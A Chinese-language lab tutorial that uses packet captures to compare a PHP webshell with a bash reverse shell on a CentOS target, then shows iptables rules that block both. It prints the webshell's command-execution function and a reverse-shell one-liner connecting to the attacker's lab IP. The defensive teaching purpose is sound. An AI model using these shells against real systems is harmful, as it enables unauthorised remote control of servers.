对linux服务器的渗透测试过程中,我们在getshell得到一个低权限的webshell后,由于webshell是非交互式shell,通常要反弹一个交互式的shell,然后进一步进行提权。那么,什么是交互式shell和非交互式shell呢,他们又是如何与靶机进行通信的呢?相信网络上的文章大家也看到很多,今天我们不说理论,先以一个抓包实验来验证一下。
实验环境:
攻击机1:win10 192.168.253.128
攻击机2:kali2020 192.168.253.168
靶机:centos6.9 192.168.253.150
实验原理:
我们在靶机上事先准备一个可以执行命令的大马lin.php,然后分别使用webshell和反弹shell对靶机进行控制,执行whoami命令,我们将两过程抓包进行比较。
1、首先,在win10浏览器登录大马,执行whoami命令,得到返回结果如下
在靶机centos6.9抓包如下:
可以看到,这个过程是由一组http请求和响应完成的,我们可以右键Follow TCP Stream查看http报文内容如下。
我们清楚了whoami这条命令的在两台主机之间的传输过程,那么whoami命令又是如何在靶机运行的呢?我们可以看下大马命令执行的部分源码:
function Exec_Run($cmd)
{
$res = '';
if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);}
elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);}
elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}
elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}
elseif(@is_resource($f = @popen($cmd,"r"))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}
return $res;
}
由上我们可知,上面过程实际是使用php的一些函数如exec、shell_exec、system、passthru实现了whoami命令在系统上的执行,我们可以将上述过程总结为一张图:
这种模式下,webshell(http://192.168.253.150/lin.php)不与用户进行交互,而是自顶向下读取和执行存放在lin.php文件中的语句指令。当它读到文件的结尾,shell也就终止了,这个过程本质上就是一个php页面的执行过程。它也能够证明webshell是一种非交互式的shell。
2、接下来,我们再对反弹shell进行抓包验证,我们在win10浏览器再次登录大马,执行命令如下:
在攻击机kali2020上使用nc接收到反弹的shell,并执行whoami命令。
上述过程,在靶机centos6.9使用wireshark抓包。可以看到,在http请求和响应过程后,192.168.253.150(centos6.9)向192.168.253.168(kali)发起了TCP三次握手请求,并握手成功。
查看第13号报文data字段,可以看到192.168.253.168(kali)向192.168.253.150(centos6.9)发送了"whoami",使用的是TCP协议。
接着看第19号报文,可以看到192.168.253.150(centos6.9)向192.168.253.168(kali)发送了返回结果"apache"
此时,我们再在centos6.9上使用netstat -anput命令查看连接状态显示:
[root@localhost ~]# netstat -anput
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 192.168.253.150:47322 192.168.253.168:8888 ESTABLISHED 5009/bash
...
...
使用pstree -p命令查看进程树
[root@localhost ~]# pstree -p
init(1)─┬─NetworkManager(1617)─┬─dhclient(3876)
│ └─{NetworkManager}(1651)
├─httpd(2081)─┬─httpd(2206)
│ ├─httpd(2207)───sh(5008)───bash(5009)
│ ├─httpd(2208)
│ ├─httpd(2209)
│ ├─httpd(2210)
│ ├─httpd(2211)
│ ├─httpd(2212)
│ ├─httpd(2213)
│ ├─httpd(2214)
│ ├─httpd(3988)
│ └─httpd(3989)
使用ps -aux查看5008号、5009号进程
[root@localhost ~]# ps -aux
...
apache 5008 0.0 0.0 11344 1172 ? S 22:41 0:00 sh -c /bin/bash -i >& /dev/tcp/192.168.253.168/8888
apache 5009 0.0 0.0 11480 1428 ? S 22:41 0:00 /bin/bash -i
...
如果这个过程,我们不使用win10,直接在kali上浏览器访问,则过程可以总结为下图。这个过程攻击机kali对centos6.9的命令操控,都是nc与pid为5009的bash进程之间通过TCP协议进行的,此过程中反弹的shell也就是一个交互式的shell。
3、至此,我们可以总结,webshell实际是一种用脚本语言编写形成的非交互式shell,而反弹shell实际是TCP协议传输数据的交互式shell。我们再回到shell的定义看,shell是“壳”,这个“壳”是相对于“核”来说的,这里的核实际上就是操作系统内核。我们从上图也可以看到,webshell实际是通过脚本页面与操作系统进行命令交互,它并没有直接与内核交互,因此称为非交互式shell。而从反弹shell的图片可以看到,其命令直接传输给操作系统内核,从而得到结果,因此也称为交互式shell。
上述反弹shell的实验,我们清楚的看到,反弹shell实际是通过linux的socket技术进行通信的,这个过程都需要建立TCP三次握手,然后在通过固定端口进行通信。对于靶机Centos6.9来说,反弹shell的TCP通信端口为某随机端口,那么我们只需要在iptables的filter表的INPUT或OUTPUT链上随便进行一个限制,让其TCP连接不能成功,即可限制反弹shell。需要注意的是,linux中iptables的默认策略都是ACCEPT,此时防火墙实际是使用黑名单策略,很容易被绕过,这也是很多攻击者经常能够反弹shell成功的原因。
因此,我们需要将默认策略修改为DROP,即白名单策略。当然,考虑到业务生产需求,服务器centos6.9还可能会有向外连接数据库(类似操作),我们一般可以将OUTPUT链设置为黑名单策略ACCEPT,而只需要在入站规则INPUT链上设置默认规则为DROP,形成入站白名单策略即可。最后,我们通过iptables命令在INPUT链上设置规则,放行我们正常的服务通过即可。以下是我以httpd服务为例设置的规则,使用如下命令放行httpd服务及其相关链接。
iptables -I INPUT -d 192.168.253.150 -p tcp --dport 80 -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT
查看iptables的filter表的规则如下
[root@localhost ~]# iptables -L
Chain INPUT (policy DROP)
target prot opt source destination
ACCEPT tcp -- anywhere 192.168.253.150 tcp dpt:http state NEW,RELATED,ESTABLISHED
ACCEPT tcp -- anywhere 192.168.253.150 tcp dpt:ssh
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
此时,由于入站规则INPUT链上只开放了80和22端口,如果反弹shell开启为45678端口,由于出站规则OUTPUT链没有限制,此时反弹shell还可以向攻击机发起TCP三次握手请求,但响应报文SYN+ACK报文由于入站规则INPUT链上并没有开启45678端口,因此反弹shell的TCP连接无法成功建立。我们在centos6.9反弹shell测试结果如下。
[root@localhost ~]# bash -i >& /dev/tcp/192.168.253.168/8888 0>&1
-bash: connect: 连接超时
-bash: /dev/tcp/192.168.253.168/8888: 连接超时
至此,我们就成功通过iptables限制了反弹shell。总结一句话,我们只要严格在防火墙入站规则上配置了白名单策略,攻击者反弹shell时候就遇到很大困难。
我们了解了iptables对反弹shell限制原理,那么iptables能不能阻断webshell呢,iptables有那么强大的功能,答案当然是可以的。其中iptables的扩展模块string模块,可以通过一定算法,对通过防火墙的报文进行检验,一旦遇到某些匹配规则的字符串,就可以根据设定动作对报文进行丢弃或放行。这听起来像不像一个IPS设备呢,没错,我们来实验一下便清楚。
实验环境:
攻击机:win10 192.168.253.128
靶机:centos6.9 192.168.253.150
我们在win10上使用菜刀连接centos6.9上事先放好的一句话木马文件caidao.php,连接成功。
我们清楚,菜刀在与一句话木马通信时,一般会使用eval函数对字符串进行操作,此处我们就不抓包证明了,有兴趣的同学可以自行抓包实验。我们在centos6.9上filter表的INPUT链上插入一条规则如下:
iptables -I INPUT -d 192.168.253.150 -p tcp --dport 80 -m string --algo kmp --string "eval" -j DROP
查看iptables规则如下
[root@localhost ~]# iptables -L
Chain INPUT (policy DROP)
target prot opt source destination
DROP tcp -- anywhere 192.168.253.150 tcp dpt:http STRING match "eval" ALGO name kmp TO 65535
ACCEPT tcp -- anywhere 192.168.253.150 tcp dpt:http state NEW,RELATED,ESTABLISHED
ACCEPT tcp -- anywhere 192.168.253.150 tcp dpt:ssh
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
此时,我们在win10上再次用菜刀连接一句话木马,已经无法连接。
我们可以通过iptables -v选项查看各条规则匹配到的报文,可以看到第一条规则确实匹配到了报文,并进行了DROP操作。
[root@localhost ~]# iptables -L -n -v
Chain INPUT (policy DROP 30 packets, 2999 bytes)
pkts bytes target prot opt in out source destination
16 13134 DROP tcp -- * * 0.0.0.0/0 192.168.253.150 tcp dpt:80 STRING match "eval" ALGO name kmp TO 65535
21 3267 ACCEPT tcp -- * * 0.0.0.0/0 192.168.253.150 tcp dpt:80 state NEW,RELATED,ESTABLISHED
1112 80384 ACCEPT tcp -- * * 0.0.0.0/0 192.168.253.150 tcp dpt:22
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 130 packets, 10674 bytes)
pkts bytes target prot opt in out source destination
这个过程像不像IPS对入侵行为的阻断过程呢?我们仅仅通过iptables一个软件防火墙便实现了该功能,可见iptables的强大。iptables虽然很早就出现了,但至今其防火墙技术思想仍然很先进,很值得每个安全从业者仔细品究。当然,iptables毕竟是软件防火墙,其性能还是远远无法和硬件防火墙相比的。我们可以以之为例,学习原理,总结思路,在实战中灵活运用,达到加固服务器主机安全的目的。